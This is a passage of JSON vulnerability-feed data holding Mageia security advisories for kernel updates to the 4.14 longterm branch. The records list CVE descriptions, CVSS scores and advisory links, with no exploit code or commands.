"accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0786", "CVE-2017-0861", "CVE-2017-1000407", "CVE-2017-12188", "CVE-2017-12190", "CVE-2017-12193", "CVE-2017-13080", "CVE-2017-15115", "CVE-2017-15265", "CVE-2017-15299", "CVE-2017-16939", "CVE-2017-16994", "CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18344", "CVE-2017-7518"], "modified": "2018-01-06T00:53:31", "id": "MGASA-2018-0064", "href": "https://advisories.mageia.org/MGASA-2018-0064.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel-tmb update provides an upgrade to the 4.14 longterm branch, currently based on 4.14.10. It also fixes at least the following security issues: An elevation of privilege vulnerability in the Broadcom wi-fi driver (CVE-2017-0786). Use-after-free vulnerability in the snd_pcm_info function in the ALSA subsystem in the Linux kernel allows attackers to gain privileges via unspecified vectors (CVE-2017-0861). Linux kernel built with the Kernel-based Virtual Machine(CONFIG_KVM) support is vulnerable to an incorrect debug exception(#DB) error. It could occur while emulating a syscall instruction. A user/process inside guest could use this flaw to potentially escalate their privileges inside guest. Linux guests are not affected.(CVE-2017-7518). arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an \"MMU potential stack buffer overrun\" (CVE-2017-12188). The bio_map_user_iov and bio_unmap_user functions in block/bio.c in the Linux kernel before 4.13.8 do unbalanced refcounting when a SCSI I/O vector has small consecutive buffers belonging to the same page. The bio_add_pc_page function merges them into one, but the page reference is never dropped. This causes a memory leak and possible system lockup (exploitable against the host OS by a guest OS user, if a SCSI disk is passed through to a virtual machine) due to an out-of-memory condition (CVE-2017-12190). The assoc_array_insert_into_terminal_node function in lib/assoc_array.c in the Linux kernel before 4.13.11 mishandles node splitting, which allows local users to cause a denial of service (NULL pointer dereference and panic) via a crafted application, as demonstrated by the keyring key type, and key addition and link creation operations (CVE-2017-12193). Wi-Fi Protected Access (WPA and WPA2) allows reinstallation of the Group Temporal Key (GTK) during the group key handshake, allowing an attacker within radio range to replay frames from access points to clients (CVE-2017-13080). The sctp_do_peeloff function in net/sctp/socket.c in the Linux kernel before 4.14 does not check whether the intended netns is used in a peel-off action, which allows local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via crafted system calls (CVE-2017-15115). Race condition in the ALSA subsystem in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted /dev/snd/seq ioctl calls, related to sound/core/seq/seq_clientmgr.c and sound/core/seq/seq_ports.c (CVE-2017-15265) The KEYS subsystem in the Linux kernel through 4.13.7 mishandles use of add_key for a key that already exists but is uninstantiated, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted system call (CVE-2017-15299). The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages (CVE-2017-16939). The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call (CVE-2017-16994). The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension (CVE-2017-16995). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling (CVE-2017-16996). The KVM implementation in the Linux kernel through 4.14.7 allows attackers to obtain potentially sensitive information from kernel memory, aka a write_mmio stack-based out-of-bounds read, related to arch/x86/kvm/x86.c and include/trace/events/kvm.h (CVE-2017-17741). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of 32-bit ALU ops (CVE-2017-17852). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations (CVE-2017-17853). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (integer overflow and memory corruption) or possibly have unspecified other impact by leveraging unrestricted integer values for pointer arithmetic (CVE-2017-17854). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars (CVE-2017-17855). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement (CVE-2017-17856). The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations (CVE-2017-17857). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 ignores unreachable code, even though it would still be processed by JIT compilers. This behavior, also considered an improper branch-pruning logic issue, could possibly be used by local users for denial of service (CVE-2017-17862). kernel/bpf/verifier.c in the Linux kernel 4.9.x through 4.9.71 does not check the relationship between pointer values and the BPF stack, which allows local users to cause a denial of service (integer overflow or invalid memory access) or possibly have unspecified other impact (CVE-2017-17863). kernel/bpf/verifier.c in the Linux kernel before 4.14 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a \"pointer leak\" (CVE-2017-17864). The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE)(CVE-2017-18344). The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic (CVE-2017-1000407). This update also adds support for WireGuard VPN. For other changes in this update, read the referenced changelogs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-06T00:53:31", "type": "mageia", "title": "kernel-tmb update provides 4.14 series and fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0786", "CVE-2017-0861", "CVE-2017-1000407", "CVE-2017-12188", "CVE-2017-12190", "CVE-2017-12193", "CVE-2017-13080", "CVE-2017-15115", "CVE-2017-15265", "CVE-2017-15299", "CVE-2017-16939", "CVE-2017-16994", "CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18344", "CVE-2017-7518"], "modified": "2018-01-06T00:53:31", "id": "MGASA-2018-0063", "href": "https://advisories.mageia.org/MGASA-2018-0063.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "This kernel update provides an upgrade to the 4.14 longterm branch, currently based on 4.14.10. It also fixes at least the following security issues: An elevation of privilege vulnerability in the Broadcom wi-fi driver (CVE-2017-0786). Use-after-free vulnerability in the snd_pcm_info function in the ALSA subsystem in the Linux kernel allows attackers to gain privileges via unspecified vectors (CVE-2017-0861). Linux kernel built with the Kernel-based Virtual Machine(CONFIG_KVM) support is vulnerable to an incorrect debug exception(#DB) error. It could occur while emulating a syscall instruction. A user/process inside guest could use this flaw to potentially escalate their privileges inside guest. Linux guests are not affected.(CVE-2017-7518). arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an \"MMU potential stack buffer overrun\" (CVE-2017-12188). The bio_map_user_iov and bio_unmap_user functions in block/bio.c in the Linux kernel before 4.13.8 do unbalanced refcounting when a SCSI I/O vector has small consecutive buffers belonging to the same page. The bio_add_pc_page function merges them into one, but the page reference is never dropped. This causes a memory leak and possible system lockup (exploitable against the host OS by a guest OS user, if a SCSI disk is passed through to a virtual machine) due to an out-of-memory condition (CVE-2017-12190). The assoc_array_insert_into_terminal_node function in lib/assoc_array.c in the Linux kernel before 4.13.11 mishandles node splitting, which allows local users to cause a denial of service (NULL pointer dereference and panic) via a crafted application, as demonstrated by the keyring key type, and key addition and link creation operations (CVE-2017-12193). Wi-Fi Protected Access (WPA and WPA2) allows reinstallation of the Group Temporal Key (GTK) during the group key handshake, allowing an attacker within radio range to replay frames from access points to clients (CVE-2017-13080). The sctp_do_peeloff function in net/sctp/socket.c in the Linux kernel before 4.14 does not check whether the intended netns is used in a peel-off action, which allows local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via crafted system calls (CVE-2017-15115). Race condition in the ALSA subsystem in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted /dev/snd/seq ioctl calls, related to sound/core/seq/seq_clientmgr.c and sound/core/seq/seq_ports.c (CVE-2017-15265) The KEYS subsystem in the Linux kernel through 4.13.7 mishandles use of add_key for a key that already exists but is uninstantiated, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted system call (CVE-2017-15299). The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages (CVE-2017-16939). The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call (CVE-2017-16994). The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension (CVE-2017-16995). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling (CVE-2017-16996). The KVM implementation in the Linux kernel through 4.14.7 allows attackers to obtain potentially sensitive information from kernel memory, aka a write_mmio stack-based out-of-bounds read, related to arch/x86/kvm/x86.c and include/trace/events/kvm.h (CVE-2017-17741). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of 32-bit ALU ops (CVE-2017-17852). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations (CVE-2017-17853). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (integer overflow and memory corruption) or possibly have unspecified other impact by leveraging unrestricted integer values for pointer arithmetic (CVE-2017-17854). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars (CVE-2017-17855). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement (CVE-2017-17856). The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations (CVE-2017-17857). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 ignores unreachable code, even though it would still be processed by JIT compilers. This behavior, also considered an improper branch-pruning logic issue, could possibly be used by local users for denial of service (CVE-2017-17862). kernel/bpf/verifier.c in the Linux kernel 4.9.x through 4.9.71 does not check the relationship between pointer values and the BPF stack, which allows local users to cause a denial of service (integer overflow or invalid memory access) or possibly have unspecified other impact (CVE-2017-17863). kernel/bpf/verifier.c in the Linux kernel before 4.14 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a \"pointer leak\" (CVE-2017-17864). The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE)(CVE-2017-18344). The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic (CVE-2017-1000407). This update also adds support for WireGuard VPN. For other changes in this update, read the referenced changelogs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-06T00:53:31", "type": "mageia", "title": "kernel update provides 4.14 series and fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0786", "CVE-2017-0861", "CVE-2017-1000407", "CVE-2017-12188", "CVE-2017-12190", "CVE-2017-12193", "CVE-2017-13080", "CVE-2017-15115", "CVE-2017-15265", "CVE-2017-15299", "CVE-2017-16939", "CVE-2017-16994", "CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17741", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-18344", "CVE-2017-7518"], "modified": "2018-01-06T00:53:31", "id": "MGASA-2018-0062", "href": "https://advisories.mageia.org/MGASA-2018-0062.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}